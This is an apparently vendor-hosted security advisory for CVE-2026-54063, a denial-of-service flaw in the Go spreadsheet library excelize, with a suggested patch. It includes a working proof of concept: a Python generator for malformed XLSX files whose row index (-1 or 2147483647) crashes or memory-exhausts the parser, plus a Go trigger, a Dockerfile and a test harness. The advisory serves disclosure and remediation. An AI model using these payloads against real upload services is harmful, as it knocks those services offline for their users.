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GHSA-h69g-9hx6-f3v4

HIGH

Excelize: Unbounded Row Index Allocation in Worksheet Parser (checkSheet OOM/Panic DoS)

Also known asCVE-2026-54063
Published
Jul 10, 2026
Updated
Jul 10, 2026
Affected
1 pkg
Patched
1 / 1
Exploits
None indexed

Blast Radius

1 pkg affected
🐹github.com/xuri/excelize/v2

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects Go packages — download data is not available via public APIs for these ecosystems.

Description

Unbounded Row Index Allocation in Worksheet Parser (checkSheet OOM/Panic DoS)

Summary

The checkSheet() function in github.com/xuri/excelize/v2 uses an attacker-controlled <row r="N"> XML attribute value directly as the length argument to make([]xlsxRow, row) without validating it against the Excel row limit (TotalRows = 1,048,576). A specially crafted XLSX file can trigger two denial-of-service variants: (A) an out-of-memory process kill when r=2147483647 forces a ~16 GB allocation attempt, and (B) a runtime panic via out-of-bounds slice indexing when r=-1. Any service that opens attacker-supplied XLSX files and calls GetCellValue is affected. No authentication is required.

Details

The vulnerable code path is triggered by calling GetCellValue (or any API that internally invokes workSheetReader) on an XLSX file containing a crafted worksheet row element.

Data flow (source → sink):

  1. excelize.go:186-193OpenReader reads attacker-controlled spreadsheet bytes.
  2. excelize.go:216-223 — ZIP reader is created and passed to ReadZipReader.
  3. lib.go:43-77 — ZIP entries are read into fileList; worksheet XML is stored by part name.
  4. excelize.go:228-229 — XML bytes are stored in f.Pkg.
  5. cell.go:71-79 — Public GetCellValue enters the worksheet value-read path.
  6. cell.go:1492-1494getCellStringFunc calls workSheetReader.
  7. excelize.go:313-324 — Worksheet XML is decoded into xlsxWorksheet.
  8. xmlWorksheet.go:302-312<row r="..."> is deserialized into xlsxRow.R int with no validation (source).
  9. excelize.go:357-377checkSheet() accumulates the maximum r value; sink: make([]xlsxRow, row) allocates a slice of that size before any bounds check.

Vulnerable code (excelize.go:373-377):

if r.R != 0 && r.R > row {
    row = r.R
}
sheetData := xlsxSheetData{Row: make([]xlsxRow, row)}  // unbounded allocation

The constant TotalRows = 1048576 is defined in templates.go:190 but is never applied before the make() call in checkSheet(), leaving the allocation fully attacker-controlled.

Variant A (r = 2147483647): make([]xlsxRow, 2147483647) attempts to allocate approximately 16 GB of memory. The Go runtime terminates the process with fatal error: runtime: out of memory.

Variant B (r = -1): The first loop in checkSheet() leaves row = 0 because the condition r.R != 0 is false for r.R = -1. The second loop then executes sheetData.Row[r.R-1], which evaluates to sheetData.Row[-2], triggering runtime error: index out of range [-2] at excelize.go:381.

Dynamic reproduction confirmed both variants inside a memory-limited Docker container (256 MB). The full panic stack trace for Variant B is:

panic: runtime error: index out of range [-2]

goroutine 1 [running]:
github.com/xuri/excelize/v2.(*xlsxWorksheet).checkSheet(...)
        /excelize/excelize.go:381
github.com/xuri/excelize/v2.(*File).workSheetReader(...)
        /excelize/excelize.go:329
github.com/xuri/excelize/v2.(*File).getCellStringFunc(...)
        /excelize/cell.go:1494
github.com/xuri/excelize/v2.(*File).GetCellValue(...)
        /excelize/cell.go:72
main.main.func1(...)
        /excelize/cmd/poc/main.go:44
main.main()
        /excelize/cmd/poc/main.go:52

Recommended remediation (excelize.go):

-func (ws *xlsxWorksheet) checkSheet() {
+func (ws *xlsxWorksheet) checkSheet() error {
     ...
         for i := 0; i < len(ws.SheetData.Row); i++ {
             r := ws.SheetData.Row[i]
+            if r.R < 0 {
+                return newInvalidRowNumberError(r.R)
+            }
+            if r.R > TotalRows {
+                return ErrMaxRows
+            }
     ...
     ws.SheetData = *sheetData
+    return nil
 }

PoC

Step 1: Generate the malicious XLSX

import zipfile

# Variant A: OOM   → row = "2147483647"
# Variant B: Panic → row = "-1"
row = "-1"

with zipfile.ZipFile("malicious.xlsx", "w", zipfile.ZIP_DEFLATED) as z:
    z.writestr("[Content_Types].xml", '''<?xml version="1.0" encoding="UTF-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
<Default Extension="xml" ContentType="application/xml"/>
<Override PartName="/xl/workbook.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"/>
<Override PartName="/xl/worksheets/sheet1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
</Types>''')
    z.writestr("_rels/.rels", '''<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="xl/workbook.xml"/>
</Relationships>''')
    z.writestr("xl/workbook.xml", '''<?xml version="1.0" encoding="UTF-8"?>
<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
          xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<sheets><sheet name="Sheet1" sheetId="1" r:id="rId1"/></sheets>
</workbook>''')
    z.writestr("xl/_rels/workbook.xml.rels", '''<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet1.xml"/>
</Relationships>''')
    z.writestr("xl/worksheets/sheet1.xml", f'''<?xml version="1.0" encoding="UTF-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
<sheetData><row r="{row}"><c r="A1"><v>1</v></c></row></sheetData>
</worksheet>''')

Step 2: Trigger the vulnerability

package main

import "github.com/xuri/excelize/v2"

func main() {
    f, err := excelize.OpenFile("malicious.xlsx")
    if err != nil { panic(err) }
    defer f.Close()
    _, err = f.GetCellValue("Sheet1", "A1")  // triggers checkSheet() → unbounded make()
    if err != nil { panic(err) }
}

Expected results:

  • Variant A (r="2147483647"): process is killed by the OOM killer (fatal error: runtime: out of memory or exit code 137).
  • Variant B (r="-1"): process panics with runtime error: index out of range [-2] at excelize.go:381 (exit code 2).

Both variants were confirmed in a Docker container with --memory 256m --memory-swap 256m. The malicious XLSX payload is a few hundred bytes.

Impact

This is a Denial-of-Service vulnerability. An unauthenticated remote attacker can crash or memory-exhaust any Go application that uses github.com/xuri/excelize/v2 to open attacker-supplied XLSX files and subsequently calls any cell-reading API (GetCellValue, GetRows, GetCols, or any function that internally triggers workSheetReader).

Who is impacted:

  • Web services with XLSX upload or import endpoints (document processors, data pipelines, BI tools).
  • CLI tools or batch jobs that parse user-supplied spreadsheet files.
  • Any application using the library to handle untrusted XLSX documents.

The attack requires no authentication and no user interaction beyond uploading a malicious file. The payload is a minimal well-formed ZIP of a few hundred bytes, making it trivial to construct and deliver. Repeated or concurrent exploitation can permanently deny service to all users of the affected application.

Reproduction artifacts

Dockerfile

# Dockerfile for VULN-001: Unbounded Row Index Allocation in excelize checkSheet()
# CWE-770 — Allocation of Resources Without Limits or Throttling
# Target: github.com/xuri/excelize/v2 @ commit f4a068b
#
# Exploit path:
#   GetCellValue -> getCellStringFunc -> workSheetReader -> checkSheet()
#   In checkSheet() (excelize.go:341-393), the attacker-controlled <row r="N">
#   attribute is used directly as make([]xlsxRow, row) size with no bounds check.
#
# Variant A (r=2147483647): OOM — make([]xlsxRow, 2147483647) exhausts memory
# Variant B (r=-1):         Panic — second loop does sheetData.Row[-2] (index OOB)

FROM golang:latest AS builder

# Copy the vulnerable excelize library source (serves as the Go module)
COPY repo/ /excelize/

# Copy the exploit main package written by poc.py
COPY vuln-001/exploit_main.go /excelize/cmd/poc/main.go

WORKDIR /excelize

# Build the exploit binary.
# -mod=mod: allow Go to update go.sum for any transitive deps.
# CGO_ENABLED=0: produce a statically-linked binary for the runtime stage.
RUN CGO_ENABLED=0 GOFLAGS="-mod=mod" go build -o /poc ./cmd/poc/

# Minimal runtime stage (golang image provides a libc for cgo-free binary too)
FROM golang:latest
COPY --from=builder /poc /poc
ENTRYPOINT ["/poc"]

poc.py

#!/usr/bin/env python3
"""
PoC for VULN-001: Unbounded Row Index Allocation in excelize checkSheet()
CWE-770 — Allocation of Resources Without Limits or Throttling
Repository: qax-os/excelize  Commit: f4a068b

Exploit mechanism:
  xlsxWorksheet.checkSheet() (excelize.go:341-393) iterates worksheet rows and
  uses the attacker-controlled <row r="N"> attribute directly as the length
  argument to make([]xlsxRow, row) without any bounds validation against
  TotalRows (1,048,576).

  Variant A (r=2147483647): make([]xlsxRow, 2^31-1) → OOM / fatal error
  Variant B (r=-1):         first loop leaves row=0; second loop executes
                            sheetData.Row[-1-1] → runtime panic: index out of range

This script:
  1. Writes exploit_main.go (the Go PoC binary source).
  2. Creates two malicious XLSX files (one per variant).
  3. Builds the Docker image.
  4. Runs each variant and captures evidence.
  5. Writes phase2_result.json with verdict.
"""

import json
import os
import subprocess
import sys
import textwrap
import zipfile

# ---------------------------------------------------------------------------
# Paths
# ---------------------------------------------------------------------------
BASE_DIR     = os.path.dirname(os.path.abspath(__file__))
PARENT_DIR   = os.path.dirname(BASE_DIR)          # Docker build context
RESULT_FILE  = os.path.join(BASE_DIR, "phase2_result.json")
DOCKERFILE   = os.path.join(BASE_DIR, "Dockerfile")
IMAGE_NAME   = "excelize-poc-vuln001"

EXPLOIT_SRC  = os.path.join(BASE_DIR, "exploit_main.go")
PANIC_XLSX   = os.path.join(BASE_DIR, "row_negative.xlsx")
OOM_XLSX     = os.path.join(BASE_DIR, "row_maxint.xlsx")


# ---------------------------------------------------------------------------
# Step 1 — Write the Go exploit source
# ---------------------------------------------------------------------------
EXPLOIT_GO = textwrap.dedent("""\
    // exploit_main.go — PoC for VULN-001
    // Triggers excelize checkSheet() unbounded allocation via malicious XLSX.
    package main

    import (
    \t"fmt"
    \t"os"
    \t"runtime/debug"

    \texcelize "github.com/xuri/excelize/v2"
    )

    func main() {
    \tif len(os.Args) < 2 {
    \t\tfmt.Fprintln(os.Stderr, "Usage: poc <xlsx_file>")
    \t\tos.Exit(1)
    \t}
    \tpath := os.Args[1]
    \tfmt.Printf("[*] Opening: %s\\n", path)

    \t// Wrap the call so we can print a structured panic message before exiting.
    \t// The panic itself is the evidence of exploitability.
    \tfunc() {
    \t\tdefer func() {
    \t\t\tif r := recover(); r != nil {
    \t\t\t\tfmt.Println("[VULN] PANIC CAUGHT — vulnerability confirmed")
    \t\t\t\tfmt.Printf("[VULN] panic value: %v\\n", r)
    \t\t\t\tfmt.Println("[VULN] Stack trace:")
    \t\t\t\tdebug.PrintStack()
    \t\t\t\tos.Exit(2) // exit 2 = exploitable crash (panic)
    \t\t\t}
    \t\t}()

    \t\tf, err := excelize.OpenFile(path)
    \t\tif err != nil {
    \t\t\tfmt.Printf("[!] OpenFile error: %v\\n", err)
    \t\t\tos.Exit(1)
    \t\t}
    \t\tdefer f.Close()

    \t\t// GetCellValue → getCellStringFunc → workSheetReader → checkSheet()
    \t\t// checkSheet() is the sink: make([]xlsxRow, row) where row is attacker-controlled.
    \t\tfmt.Println("[*] Calling GetCellValue — entering checkSheet() sink")
    \t\tval, err := f.GetCellValue("Sheet1", "A1")
    \t\tif err != nil {
    \t\t\t// Some errors surface instead of panicking (e.g. allocation failures
    \t\t\t// that Go converts to errors in some configurations).
    \t\t\tfmt.Printf("[!] GetCellValue error: %v\\n", err)
    \t\t\tos.Exit(3) // exit 3 = error path (still abnormal)
    \t\t}
    \t\tfmt.Printf("[*] GetCellValue returned normally, value=%q (no crash)\\n", val)
    \t}()
    }
""")


def write_exploit_source() -> None:
    with open(EXPLOIT_SRC, "w") as fh:
        fh.write(EXPLOIT_GO)
    print(f"[+] Wrote exploit source: {EXPLOIT_SRC}")


# ---------------------------------------------------------------------------
# Step 2 — Build malicious XLSX files
# ---------------------------------------------------------------------------
CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
    '<Default Extension="xml"  ContentType="application/xml"/>'
    '<Override PartName="/xl/workbook.xml"'
    ' ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"/>'
    '<Override PartName="/xl/worksheets/sheet1.xml"'
    ' ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>'
    '</Types>'
)

RELS = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1"'
    ' Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument"'
    ' Target="xl/workbook.xml"/>'
    '</Relationships>'
)

WORKBOOK = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"'
    ' xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
    '<sheets><sheet name="Sheet1" sheetId="1" r:id="rId1"/></sheets>'
    '</workbook>'
)

WORKBOOK_RELS = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1"'
    ' Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet"'
    ' Target="worksheets/sheet1.xml"/>'
    '</Relationships>'
)


def sheet_xml(row_r: str) -> str:
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
        f'<sheetData><row r="{row_r}"><c r="A1"><v>1</v></c></row></sheetData>'
        '</worksheet>'
    )


def build_xlsx(path: str, row_r: str) -> None:
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",        CONTENT_TYPES)
        z.writestr("_rels/.rels",               RELS)
        z.writestr("xl/workbook.xml",           WORKBOOK)
        z.writestr("xl/_rels/workbook.xml.rels", WORKBOOK_RELS)
        z.writestr("xl/worksheets/sheet1.xml",  sheet_xml(row_r))
    print(f"[+] Created {os.path.basename(path)}  (row r={row_r!r})")


# ---------------------------------------------------------------------------
# Step 3 — Docker helpers
# ---------------------------------------------------------------------------
def run_cmd(cmd: list, timeout: int = 600) -> subprocess.CompletedProcess:
    print(f"[>] {' '.join(str(x) for x in cmd)}")
    return subprocess.run(
        cmd,
        capture_output=True,
        text=True,
        timeout=timeout,
    )


def docker_build() -> tuple[bool, str]:
    result = run_cmd(
        [
            "docker", "build",
            "--no-cache",
            "-f", DOCKERFILE,
            "-t", IMAGE_NAME,
            PARENT_DIR,
        ],
        timeout=600,
    )
    combined = result.stdout + result.stderr
    if result.returncode != 0:
        print(f"[-] docker build FAILED (rc={result.returncode})")
        print(combined[-4000:])
        return False, combined
    print("[+] Docker image built successfully")
    return True, combined


def docker_run_variant(label: str, xlsx_path: str, mem: str = "256m", timeout: int = 90) -> dict:
    """Run the exploit container against one XLSX file and return analysis dict."""
    cmd = [
        "docker", "run", "--rm",
        "--memory", mem,
        "--memory-swap", mem,
        "-v", f"{xlsx_path}:/input.xlsx:ro",
        IMAGE_NAME,
        "/input.xlsx",
    ]
    run_cmd_str = " ".join(cmd)
    try:
        result = run_cmd(cmd, timeout=timeout)
        rc = result.returncode
        stdout = result.stdout or ""
        stderr = result.stderr or ""
    except subprocess.TimeoutExpired:
        rc = -99
        stdout = ""
        stderr = f"TIMEOUT after {timeout}s"

    combined = stdout + stderr
    print(f"\n--- {label} ---")
    print(f"  exit code : {rc}")
    print(f"  stdout    : {stdout[:1200]}")
    print(f"  stderr    : {stderr[:1200]}")

    is_panic = any(kw in combined for kw in (
        "index out of range",
        "PANIC CAUGHT",
        "runtime error",
        "goroutine ",
        "panic:",
    ))
    is_oom = any(kw in combined for kw in (
        "out of memory",
        "cannot allocate",
        "fatal error",
        "makeslice",
    )) or rc == 137

    # exit 2 = panic caught; exit 137 = OOM kill; exit 3 = error path
    crashed = rc != 0 and (is_panic or is_oom or rc in (2, 3, 137))

    return {
        "label":    label,
        "rc":       rc,
        "is_panic": is_panic,
        "is_oom":   is_oom,
        "crashed":  crashed,
        "run_cmd":  run_cmd_str,
        "snippet":  combined[:1500].strip(),
    }


# ---------------------------------------------------------------------------
# Main
# ---------------------------------------------------------------------------
def main() -> None:
    print("=" * 65)
    print("VULN-001 PoC — excelize checkSheet() unbounded allocation DoS")
    print("=" * 65)

    # 1. Write Go exploit source (needed before docker build)
    write_exploit_source()

    # 2. Create malicious XLSX payloads
    build_xlsx(PANIC_XLSX, "-1")          # Variant B: index OOB panic
    build_xlsx(OOM_XLSX,   "2147483647")  # Variant A: 2 GB+ make() → OOM

    # 3. Build Docker image
    build_cmd = (
        f"docker build --no-cache -f {DOCKERFILE} -t {IMAGE_NAME} {PARENT_DIR}"
    )
    build_ok, build_out = docker_build()
    if not build_ok:
        payload = {
            "passed":        False,
            "verdict":       "FAIL",
            "reason":        (
                "Docker 이미지 빌드에 실패했습니다. golang:latest 이미지가 go.mod의 "
                "'go 1.25.0' 요건을 충족하지 않을 수 있습니다. Dockerfile에서 "
                "'golang:1.25' 등 명시적 버전 태그로 교체 후 재시도 바랍니다."
            ),
            "build_command": build_cmd,
            "run_command":   "",
            "poc_command":   f"python3 {os.path.abspath(__file__)}",
            "evidence":      build_out[-2000:],
            "artifacts":     ["Dockerfile", "poc.py"],
        }
        with open(RESULT_FILE, "w") as fh:
            json.dump(payload, fh, indent=2, ensure_ascii=False)
        print(f"\n[!] FAIL result → {RESULT_FILE}")
        sys.exit(1)

    # 4. Run both variants
    ev_panic = docker_run_variant(
        "Variant B — r=-1 (index out of range panic)", PANIC_XLSX, mem="256m")
    ev_oom   = docker_run_variant(
        "Variant A — r=2147483647 (OOM)",              OOM_XLSX,   mem="256m")

    # 5. Verdict
    passed = ev_panic["crashed"] or ev_oom["crashed"]

    if ev_panic["crashed"]:
        primary, primary_ev = "B (r=-1, panic)", ev_panic
    elif ev_oom["crashed"]:
        primary, primary_ev = "A (r=2147483647, OOM)", ev_oom
    else:
        primary, primary_ev = "B (r=-1, panic)", ev_panic  # best-effort

    if passed:
        reason = (
            f"실행 결과 비정상 종료 확인됨 (주요 variant: {primary}). "
            f"Variant B(r=-1): rc={ev_panic['rc']}, panic={ev_panic['is_panic']}; "
            f"Variant A(r=2147483647): rc={ev_oom['rc']}, oom={ev_oom['is_oom']}. "
            "excelize.go:377 make([]xlsxRow, row)에 대한 bounds 검증 부재가 "
            "컨테이너 내 실제 DoS(패닉/OOM)를 유발함을 실행으로 증명."
        )
        verdict = "PASS"
    else:
        reason = (
            "컨테이너 실행이 완료되었으나 충돌(패닉/OOM) 증거가 관측되지 않음. "
            f"Variant B rc={ev_panic['rc']}, Variant A rc={ev_oom['rc']}. "
            "가능한 원인: (1) Go 런타임이 make() 실패를 panic 대신 error로 반환, "
            "(2) 메모리 한도 초과 전 OOM killer가 작동하지 않음. "
            "다음을 시도: --memory 64m으로 재실행, 또는 호스트에서 직접 Go 빌드 후 실행."
        )
        verdict = "FAIL"

    phase2 = {
        "passed":        passed,
        "verdict":       verdict,
        "reason":        reason,
        "build_command": build_cmd,
        "run_command":   primary_ev["run_cmd"],
        "poc_command":   f"python3 {os.path.abspath(__file__)}",
        "evidence":      primary_ev["snippet"],
        "artifacts":     ["Dockerfile", "poc.py"],
    }

    with open(RESULT_FILE, "w") as fh:
        json.dump(phase2, fh, indent=2, ensure_ascii=False)

    print(f"\n{'='*65}")
    print(f"Verdict : {verdict}  (passed={passed})")
    print(f"Result  → {RESULT_FILE}")
    print("=" * 65)


if __name__ == "__main__":
    main()

Affected Packages

1 total 1 fixed
EcosystemPackageVulnerable rangeFix
🐹Gogithub.com/xuri/excelize/v2all versions2.11.0

Detection & mitigation playbook

Open-source dependency
  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/xuri/excelize/v2. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

  2. Fix

    Update github.com/xuri/excelize/v2 to 2.11.0 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-h69g-9hx6-f3v4 is resolved across your whole dependency graph.

  3. Workarounds

    If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

  4. How O3 protects you

    O3 pinpoints whether GHSA-h69g-9hx6-f3v4 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-h69g-9hx6-f3v4. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

## Unbounded Row Index Allocation in Worksheet Parser (checkSheet OOM/Panic DoS) ### Summary The `checkSheet()` function in `github.com/xuri/excelize/v2` uses an attacker-controlled `<row r="N">` XML attribute value directly as the length argument to `make([]xlsxRow, row)` without validating it against the Excel row limit (`TotalRows = 1,048,576`). A specially crafted XLSX file can trigger two denial-of-service variants: (A) an out-of-memory process kill when `r=2147483647` forces a ~16 GB allocation attempt, and (B) a runtime panic via out-of-bounds slice indexing when `r=-1`. Any service th
O3 Security · Impact-Aware SCA

Is GHSA-h69g-9hx6-f3v4 in your dependencies?

O3 detects GHSA-h69g-9hx6-f3v4 across Go dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.